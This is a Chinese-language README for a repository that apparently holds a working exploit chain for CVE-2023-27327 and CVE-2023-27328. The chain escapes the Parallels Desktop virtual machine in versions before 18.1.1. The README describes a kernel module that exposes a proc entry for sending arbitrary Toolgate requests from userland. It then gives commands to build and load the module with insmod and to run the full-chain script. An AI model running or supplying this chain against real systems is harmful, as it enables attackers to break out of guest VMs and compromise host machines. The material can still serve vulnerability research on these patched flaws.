本仓库包含针对 CVE-2023-27327 和 CVE-2023-27328 的漏洞利用代码,它们可以组合使用,在 Parallels Desktop 18.1.1 之前版本中逃逸 Parallels Desktop 虚拟机。
它还包含一个所需内核模块的代码,位于 prl_mod 中,该模块可利用在 /proc/driver/prl_tg_pwn 创建的 proc 条目,从用户态发送任意 Toolgate 请求(< opcode 0x8000)。
构建并加载内核模块:
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
运行漏洞利用:
cd ..
pip install -r requirements.txt
./3_full_chain.py